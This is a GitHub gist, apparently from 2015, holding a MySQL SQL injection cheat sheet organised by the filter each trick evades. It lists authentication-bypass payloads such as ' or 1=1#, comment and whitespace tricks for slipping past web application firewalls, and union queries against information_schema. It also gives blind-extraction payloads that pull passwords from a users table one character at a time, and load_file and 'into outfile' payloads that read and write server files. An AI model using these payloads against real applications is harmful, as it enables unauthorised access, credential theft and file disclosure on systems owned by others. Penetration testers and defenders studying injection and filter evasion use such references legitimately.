Created
November 21, 2015 21:11
-
-
Save JABirchall/7ac5762fc29b37a483a9 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Basic filter | |
| Comments | |
| ‘ or 1=1# | |
| ‘ or 1=1– – | |
| ‘ or 1=1/* (MySQL < 5.1) | |
| ' or 1=1;%00 | |
| ' or 1=1 union select 1,2 as ` | |
| ' or#newline | |
| 1='1 | |
| ' or– -newline | |
| 1='1 | |
| ' /*!50000or*/1='1 | |
| ' /*!or*/1='1 | |
| Prefixes | |
| + – ~ ! | |
| ‘ or –+2=- -!!!’2 | |
| Operators | |
| ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL | |
| Whitespaces | |
| %20 %09 %0a %0b %0c %0d %a0 /**/ | |
| ‘or+(1)sounds/**/like“1“–%a0- | |
| ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)# | |
| Strings with quotes | |
| SELECT ‘a’ | |
| SELECT “a” | |
| SELECT n’a’ | |
| SELECT b’1100001′ | |
| SELECT _binary’1100001′ | |
| SELECT x’61’ | |
| Strings without quotes | |
| ‘abc’ = 0x616263 | |
| Aliases | |
| select pass as alias from users | |
| select pass aliasalias from users | |
| select pass`alias alias`from users | |
| Typecasting | |
| ‘ or true = ‘1 # or 1=1 | |
| ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1 | |
| ‘ or ‘1 # or true | |
| Compare operator typecasting | |
| select * from users where ‘a’=’b’=’c’ | |
| select * from users where (‘a’=’b’)=’c’ | |
| select * from users where (false)=’c’ | |
| select * from users where (0)=’c’ | |
| select * from users where (0)=0 | |
| select * from users where true | |
| select * from users | |
| Authentication bypass ‘=’ | |
| select * from users where name = ”=” | |
| select * from users where false = ” | |
| select * from users where 0 = 0 | |
| select * from users where true | |
| select * from users | |
| Authentication bypass ‘-‘ | |
| select * from users where name = ”-” | |
| select * from users where name = 0-0 | |
| select * from users where 0 = 0 | |
| select * from users where true | |
| select * from users | |
| Function filter | |
| General function filtering | |
| ascii (97) | |
| load_file/*foo*/(0x616263) | |
| Strings with functions | |
| ‘abc’ = unhex(616263) | |
| ‘abc’ = char(97,98,99) | |
| hex(‘a’) = 61 | |
| ascii(‘a’) = 97 | |
| ord(‘a’) = 97 | |
| ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36)) | |
| Strings extracted from gadgets | |
| collation(\N) // binary | |
| collation(user()) // utf8_general_ci | |
| @@time_format // %H:%i:%s | |
| @@binlog_format // MIXED | |
| @@version_comment // MySQL Community Server (GPL) | |
| dayname(from_days(401)) // Monday | |
| dayname(from_days(403)) // Wednesday | |
| monthname(from_days(690)) // November | |
| monthname(from_unixtime(1)) // January | |
| collation(convert((1)using/**/koi8r)) // koi8r_general_ci | |
| (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs | |
| Special characters extracted from gadgets | |
| aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa | |
| des_encrypt(1,2) // ‚GÒ/ïÖk | |
| @@ft_boolean_syntax // + -><()~*:""&| | |
| @@date_format // %Y-%m-%d | |
| @@innodb_log_group_home_dir // .\ | |
| Integer representations | |
| false: 0 | |
| true: 1 | |
| true+true: 2 | |
| floor(pi()): 3 | |
| ceil(pi()): 4 | |
| floor(version()): 5 | |
| ceil(version()): 6 | |
| ceil(pi()+pi()): 7 | |
| floor(version()+pi()): 8 | |
| floor(pi()*pi()): 9 | |
| ceil(pi()*pi()): 10 | |
| concat(true,true): 11 | |
| ceil(pi()*pi())+true: 11 | |
| ceil(pi()+pi()+version()): 12 | |
| floor(pi()*pi()+pi()): 13 | |
| ceil(pi()*pi()+pi()): 14 | |
| ceil(pi()*pi()+version()): 15 | |
| floor(pi()*version()): 16 | |
| ceil(pi()*version()): 17 | |
| ceil(pi()*version())+true: 18 | |
| floor((pi()+pi())*pi()): 19 | |
| ceil((pi()+pi())*pi()): 20 | |
| ceil(ceil(pi())*version()): 21 | |
| concat(true+true,true): 21 | |
| ceil(pi()*ceil(pi()+pi())): 22 | |
| ceil((pi()+ceil(pi()))*pi()): 23 | |
| ceil(pi())*ceil(version()): 24 | |
| floor(pi()*(version()+pi())): 25 | |
| floor(version()*version()): 26 | |
| ceil(version()*version()): 27 | |
| ceil(pi()*pi()*pi()-pi()): 28 | |
| floor(pi()*pi()*floor(pi())): 29 | |
| ceil(pi()*pi()*floor(pi())): 30 | |
| concat(floor(pi()),false): 30 | |
| floor(pi()*pi()*pi()): 31 | |
| ceil(pi()*pi()*pi()): 32 | |
| ceil(pi()*pi()*pi())+true: 33 | |
| ceil(pow(pi(),pi())-pi()): 34 | |
| ceil(pi()*pi()*pi()+pi()): 35 | |
| floor(pow(pi(),pi())): 36 | |
| @@new: 0 | |
| @@log_bin: 1 | |
| !pi(): 0 | |
| !!pi(): 1 | |
| true-~true: 3 | |
| log(-cos(pi())): 0 | |
| -cos(pi()): 1 | |
| coercibility(user()): 3 | |
| coercibility(now()): 4 | |
| minute(now()) | |
| hour(now()) | |
| day(now()) | |
| week(now()) | |
| month(now()) | |
| year(now()) | |
| quarter(now()) | |
| year(@@timestamp) | |
| crc32(true) | |
| Extract substrings | |
| substr(‘abc’,1,1) = ‘a’ | |
| substr(‘abc’ from 1 for 1) = ‘a’ | |
| substring(‘abc’,1,1) = ‘a’ | |
| substring(‘abc’ from 1 for 1) = ‘a’ | |
| mid(‘abc’,1,1) = ‘a’ | |
| mid(‘abc’ from 1 for 1) = ‘a’ | |
| lpad(‘abc’,1,space(1)) = ‘a’ | |
| rpad(‘abc’,1,space(1)) = ‘a’ | |
| left(‘abc’,1) = ‘a’ | |
| reverse(right(reverse(‘abc’),1)) = ‘a’ | |
| insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’ | |
| space(0) = trim(version()from(version())) | |
| Search substrings | |
| locate(‘a’,’abc’) | |
| position(‘a’,’abc’) | |
| position(‘a’ IN ‘abc’) | |
| instr(‘abc’,’a’) | |
| substring_index(‘ab’,’b’,1) | |
| Cut substrings | |
| length(trim(leading ‘a’ FROM ‘abc’)) | |
| length(replace(‘abc’, ‘a’, ”)) | |
| Compare strings | |
| strcmp(‘a’,’a’) | |
| mod(‘a’,’a’) | |
| find_in_set(‘a’,’a’) | |
| field(‘a’,’a’) | |
| count(concat(‘a’,’a’)) | |
| String length | |
| length() | |
| bit_length() | |
| char_length() | |
| octet_length() | |
| bit_count() | |
| String case | |
| ucase | |
| lcase | |
| lower | |
| upper | |
| password(‘a’) != password(‘A’) | |
| old_password(‘a’) != old_password(‘A’) | |
| md5(‘a’) != md5(‘A’) | |
| sha(‘a’) != sha(‘A’) | |
| aes_encrypt(‘a’) != aes_encrypt(‘A’) | |
| des_encrypt(‘a’) != des_encrypt(‘A’) | |
| Keyword filter | |
| Connected keyword filtering | |
| (0)union(select(table_name),column_name,… | |
| 0/**/union/*!50000select*/table_name`foo`/**/… | |
| 0%a0union%a0select%09group_concat(table_name)…. | |
| 0’union all select all`table_name`foo from`information_schema`. `tables` | |
| OR, AND | |
| ‘||1=’1 | |
| ‘&&1=’1 | |
| ‘=’ | |
| ‘-‘ | |
| OR, AND, UNION | |
| ‘ and (select pass from users limit 1)=’secret | |
| OR, AND, UNION, LIMIT | |
| ‘ and (select pass from users where id =1)=’a | |
| OR, AND, UNION, LIMIT, WHERE | |
| ‘ and (select pass from users group by id having id = 1)=’a | |
| OR, AND, UNION, LIMIT, WHERE, GROUP | |
| ‘ and length((select pass from users having substr(pass,1,1)=’a’)) | |
| OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING | |
| ‘ and (select substr(group_concat(pass),1,1) from users)=’a | |
| ‘ and substr((select max(pass) from users),1,1)=’a | |
| ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a | |
| OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT | |
| ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a | |
| ‘=” into outfile ‘/var/www/dump.txt | |
| OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE | |
| ‘ procedure analyse()# | |
| ‘-if(name=’Admin’,1,0)# | |
| ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)# | |
| Control flow | |
| case ‘a’ when ‘a’ then 1 [else 0] end | |
| case when ‘a’=’a’ then 1 [else 0] end | |
| if(‘a’=’a’,1,0) | |
| ifnull(nullif(‘a’,’a’),1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment